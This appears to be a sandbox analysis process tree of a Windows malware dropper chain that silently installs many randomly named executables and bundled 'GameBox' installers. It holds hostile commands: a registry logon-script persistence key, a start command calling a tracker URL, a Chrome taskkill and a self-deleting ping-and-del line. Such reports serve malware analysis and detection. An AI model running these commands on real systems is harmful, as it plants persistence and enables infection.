                                                                                                          reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                                          7⤵
                                                                                                            PID:5976
                                                                                                        • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                          "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                          6⤵
                                                                                                          • Loads dropped DLL
                                                                                                          PID:9204
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                          6⤵
                                                                                                          • Checks computer location settings
                                                                                                          PID:5796
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-VFKM6.tmp\{app}\vdi_compiler.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-VFKM6.tmp\{app}\vdi_compiler"
                                                                                                          6⤵
                                                                                                            PID:7116
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-VFKM6.tmp\{app}\vdi_compiler.exe"
                                                                                                              7⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Enumerates connected drives
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              PID:4964
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                8⤵
                                                                                                                • Drops file in Drivers directory
                                                                                                                • Drops file in System32 directory
                                                                                                                • Drops file in Windows directory
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                PID:7800
                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                ping localhost -n 4
                                                                                                                8⤵
                                                                                                                • Runs ping.exe
                                                                                                                PID:8332
                                                                                                  • C:\Users\Admin\Documents\_rAgYUQPqmsyc12CrNPx57xM.exe
                                                                                                    "C:\Users\Admin\Documents\_rAgYUQPqmsyc12CrNPx57xM.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:508
                                                                                                  • C:\Users\Admin\Documents\7FJCDaF5QNpVqvwTLjFOrtsD.exe
                                                                                                    "C:\Users\Admin\Documents\7FJCDaF5QNpVqvwTLjFOrtsD.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:2152
                                                                                                    • C:\Users\Admin\Documents\7FJCDaF5QNpVqvwTLjFOrtsD.exe
                                                                                                      C:\Users\Admin\Documents\7FJCDaF5QNpVqvwTLjFOrtsD.exe
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4120
                                                                                                  • C:\Users\Admin\Documents\uGP44CElcgUnGSypraDn8rKf.exe
                                                                                                    "C:\Users\Admin\Documents\uGP44CElcgUnGSypraDn8rKf.exe"
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:4140
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-O5LE9.tmp\uGP44CElcgUnGSypraDn8rKf.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-O5LE9.tmp\uGP44CElcgUnGSypraDn8rKf.tmp" /SL5="$90072,138429,56832,C:\Users\Admin\Documents\uGP44CElcgUnGSypraDn8rKf.exe"
                                                                                                      3⤵
                                                                                                        PID:4484
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-K52DO.tmp\Setup.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-K52DO.tmp\Setup.exe" /Verysilent
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:1200
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4892
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 760
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:6840
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 812
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:5776
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 816
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:1624
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 860
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:5100
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 972
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:6732
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1004
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:7544
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1020
                                                                                                              6⤵
                                                                                                              • Program crash
                                                                                                              PID:8048
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:1336
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-G2P9A.tmp\WEATHER Manager.tmp
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-G2P9A.tmp\WEATHER Manager.tmp" /SL5="$102CC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              PID:2196
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-NSPRR.tmp\Setup.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-NSPRR.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                7⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Enumerates connected drives
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                PID:7736
                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-NSPRR.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-NSPRR.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282276 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                  8⤵
                                                                                                                    PID:9212
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1044
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                6⤵
                                                                                                                  PID:5100
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                    7⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:7348
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                5⤵
                                                                                                                  PID:192
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-RM0KH.tmp\MediaBurner2.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-RM0KH.tmp\MediaBurner2.tmp" /SL5="$4028E,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                    6⤵
                                                                                                                      PID:5268
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-QC3KU.tmp\3377047_logo_media.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-QC3KU.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                                                        7⤵
                                                                                                                        • Drops file in Drivers directory
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Adds Run key to start application
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        PID:5076
                                                                                                                        • C:\Program Files\Uninstall Information\GTEILCVQCS\ultramediaburner.exe
                                                                                                                          "C:\Program Files\Uninstall Information\GTEILCVQCS\ultramediaburner.exe" /VERYSILENT
                                                                                                                          8⤵
                                                                                                                            PID:7364
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-ALAK1.tmp\ultramediaburner.tmp
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-ALAK1.tmp\ultramediaburner.tmp" /SL5="$30292,281924,62464,C:\Program Files\Uninstall Information\GTEILCVQCS\ultramediaburner.exe" /VERYSILENT
                                                                                                                              9⤵
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:7620
                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                10⤵
                                                                                                                                  PID:7976
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\90-a9732-ea7-31784-5312de4666c95\Saqaekyrogae.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\90-a9732-ea7-31784-5312de4666c95\Saqaekyrogae.exe"
                                                                                                                              8⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              PID:7584
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\47-43a4f-d86-8d389-2af83fc2537e1\Syhozhuwashae.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\47-43a4f-d86-8d389-2af83fc2537e1\Syhozhuwashae.exe"
                                                                                                                              8⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:5744
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3dcjepfo.ph1\GcleanerEU.exe /eufive & exit
                                                                                                                                9⤵
                                                                                                                                  PID:8412
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3dcjepfo.ph1\GcleanerEU.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\3dcjepfo.ph1\GcleanerEU.exe /eufive
                                                                                                                                    10⤵
                                                                                                                                      PID:9128
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v0ga53xa.h1q\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                    9⤵
                                                                                                                                      PID:8524
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\v0ga53xa.h1q\installer.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\v0ga53xa.h1q\installer.exe /qn CAMPAIGN="654"
                                                                                                                                        10⤵
                                                                                                                                          PID:8292
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yaieh4w3.uhj\ufgaa.exe & exit
                                                                                                                                        9⤵
                                                                                                                                          PID:8644
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p5arbpzf.df3\anyname.exe & exit
                                                                                                                                          9⤵
                                                                                                                                            PID:8712
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\p5arbpzf.df3\anyname.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\p5arbpzf.df3\anyname.exe
                                                                                                                                              10⤵
                                                                                                                                                PID:8516
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\p5arbpzf.df3\anyname.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\p5arbpzf.df3\anyname.exe" -q
                                                                                                                                                  11⤵
                                                                                                                                                    PID:7888
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uoqpicn4.uga\gcleaner.exe /mixfive & exit
                                                                                                                                                9⤵
                                                                                                                                                  PID:7884
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\uoqpicn4.uga\gcleaner.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\uoqpicn4.uga\gcleaner.exe /mixfive
                                                                                                                                                    10⤵
                                                                                                                                                      PID:5592
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dc3j5i5m.aop\autosubplayer.exe /S & exit
                                                                                                                                                    9⤵
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:9172
                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3088
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\2714212.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\2714212.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4840
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7425688.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7425688.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3772
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4136537.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4136537.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                              PID:3152
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\1405876.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\1405876.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2056
                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                            5⤵
                                                                                                                                              PID:5144
                                                                                                                                              • C:\Users\Admin\Documents\23RGzOe21COzc6vrNIX50yKU.exe
                                                                                                                                                "C:\Users\Admin\Documents\23RGzOe21COzc6vrNIX50yKU.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                PID:6916
                                                                                                                                                • C:\Users\Admin\Documents\23RGzOe21COzc6vrNIX50yKU.exe
                                                                                                                                                  C:\Users\Admin\Documents\23RGzOe21COzc6vrNIX50yKU.exe
                                                                                                                                                  7⤵
                                                                                                                                                    PID:5652
                                                                                                                                                • C:\Users\Admin\Documents\9VbNH6SQteYuJfiElXymTRlu.exe
                                                                                                                                                  "C:\Users\Admin\Documents\9VbNH6SQteYuJfiElXymTRlu.exe"
                                                                                                                                                  6⤵
                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                  PID:7044
                                                                                                                                                • C:\Users\Admin\Documents\Nue8dRedqKBYND0qNI6eMzfr.exe
                                                                                                                                                  "C:\Users\Admin\Documents\Nue8dRedqKBYND0qNI6eMzfr.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:7112
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\6697760.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\6697760.exe"
                                                                                                                                                      7⤵
                                                                                                                                                        PID:6372
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\4098993.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\4098993.exe"
                                                                                                                                                        7⤵
                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                        PID:7200
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\4683898.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\4683898.exe"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:7536
                                                                                                                                                      • C:\Users\Admin\Documents\D3GA7LJXyiS5_I26LhKUa56l.exe
                                                                                                                                                        "C:\Users\Admin\Documents\D3GA7LJXyiS5_I26LhKUa56l.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:7152
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 760
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:7032
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 792
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5272
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 796
                                                                                                                                                            7⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:4852
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 824
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:6100
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 956
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:8012
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 992
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:7240
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 1048
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:152
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 1360
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:4732
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 1404
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5860
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 1420
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:6288
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 1592
                                                                                                                                                            7⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:8592
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 1668
                                                                                                                                                            7⤵
                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:9040
                                                                                                                                                        • C:\Users\Admin\Documents\7kd6CTG17SiyEhb68ULaDqVD.exe
                                                                                                                                                          "C:\Users\Admin\Documents\7kd6CTG17SiyEhb68ULaDqVD.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:5568
                                                                                                                                                            • C:\Users\Admin\Documents\7kd6CTG17SiyEhb68ULaDqVD.exe
                                                                                                                                                              "C:\Users\Admin\Documents\7kd6CTG17SiyEhb68ULaDqVD.exe" -q
                                                                                                                                                              7⤵
                                                                                                                                                                PID:8164
                                                                                                                                                            • C:\Users\Admin\Documents\RS0hA_YdR9or67Rt7P3EMf8K.exe
                                                                                                                                                              "C:\Users\Admin\Documents\RS0hA_YdR9or67Rt7P3EMf8K.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:6328
                                                                                                                                                              • C:\Users\Admin\Documents\DyFgMPQDX4y9lqKyWRonCowX.exe
                                                                                                                                                                "C:\Users\Admin\Documents\DyFgMPQDX4y9lqKyWRonCowX.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:6456
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-TDOB0.tmp\DyFgMPQDX4y9lqKyWRonCowX.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-TDOB0.tmp\DyFgMPQDX4y9lqKyWRonCowX.tmp" /SL5="$20434,138429,56832,C:\Users\Admin\Documents\DyFgMPQDX4y9lqKyWRonCowX.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    PID:3836
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-A2KUL.tmp\Setup.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-A2KUL.tmp\Setup.exe" /Verysilent
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      PID:8004
                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                        PID:5524
                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282276 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:8640
                                                                                                                                                                  • C:\Users\Admin\Documents\4p0w5WxbCoCfy0X56nZUIbmC.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\4p0w5WxbCoCfy0X56nZUIbmC.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    PID:6544
                                                                                                                                                                  • C:\Users\Admin\Documents\DuJjqIUTqbp1V5ybS1ehB4bd.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\DuJjqIUTqbp1V5ybS1ehB4bd.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    PID:6616
                                                                                                                                                                  • C:\Users\Admin\Documents\s29dYRLC_sSUSAeeQklX3b5j.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\s29dYRLC_sSUSAeeQklX3b5j.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:6728
                                                                                                                                                                    • C:\Users\Admin\Documents\YzSXtUrPh4FD304R4NX0Rjm3.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\YzSXtUrPh4FD304R4NX0Rjm3.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:6868
                                                                                                                                                                      • C:\Users\Admin\Documents\99CjVciGODax1PxLbvD2nY5t.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\99CjVciGODax1PxLbvD2nY5t.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:7000
                                                                                                                                                                        • C:\Users\Admin\Documents\M5yl3A1KSdzpBTVPT0PGffcW.exe
                                                                                                                                                                          "C:\Users\Admin\Documents\M5yl3A1KSdzpBTVPT0PGffcW.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          PID:7040
                                                                                                                                                                          • C:\Users\Admin\Documents\M5yl3A1KSdzpBTVPT0PGffcW.exe
                                                                                                                                                                            C:\Users\Admin\Documents\M5yl3A1KSdzpBTVPT0PGffcW.exe
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:5276
                                                                                                                                                                            • C:\Users\Admin\Documents\M5yl3A1KSdzpBTVPT0PGffcW.exe
                                                                                                                                                                              C:\Users\Admin\Documents\M5yl3A1KSdzpBTVPT0PGffcW.exe
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:7212
                                                                                                                                                                              • C:\Users\Admin\Documents\M5yl3A1KSdzpBTVPT0PGffcW.exe
                                                                                                                                                                                C:\Users\Admin\Documents\M5yl3A1KSdzpBTVPT0PGffcW.exe
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:7516
                                                                                                                                                                              • C:\Users\Admin\Documents\x2a9li6GdyxNxx8sQIGoTRMA.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\x2a9li6GdyxNxx8sQIGoTRMA.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                PID:6408
                                                                                                                                                                              • C:\Users\Admin\Documents\AlyF8OKSgFhX5HJsLbsQLacf.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\AlyF8OKSgFhX5HJsLbsQLacf.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4604
                                                                                                                                                                                • C:\Users\Admin\Documents\4zecKQ9cVtuzFSsZ8Ijc1OQF.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\4zecKQ9cVtuzFSsZ8Ijc1OQF.exe"
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:6192
                                                                                                                                                                                    • C:\Users\Admin\Documents\4zecKQ9cVtuzFSsZ8Ijc1OQF.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\4zecKQ9cVtuzFSsZ8Ijc1OQF.exe"
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:4968
                                                                                                                                                                                    • C:\Users\Admin\Documents\nqsJe_VpLReA6cV1VFv4Pgpm.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\nqsJe_VpLReA6cV1VFv4Pgpm.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                      PID:6872
                                                                                                                                                                                    • C:\Users\Admin\Documents\hSP3perM_j1j4hS4w6I1UElf.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\hSP3perM_j1j4hS4w6I1UElf.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:4368
                                                                                                                                                                                      • C:\Users\Admin\Documents\BJjqa2mKHNxKS3u7ExI_U4is.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\BJjqa2mKHNxKS3u7ExI_U4is.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:5744
                                                                                                                                                                                          • C:\Users\Admin\Documents\BJjqa2mKHNxKS3u7ExI_U4is.exe
                                                                                                                                                                                            C:\Users\Admin\Documents\BJjqa2mKHNxKS3u7ExI_U4is.exe
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:7288
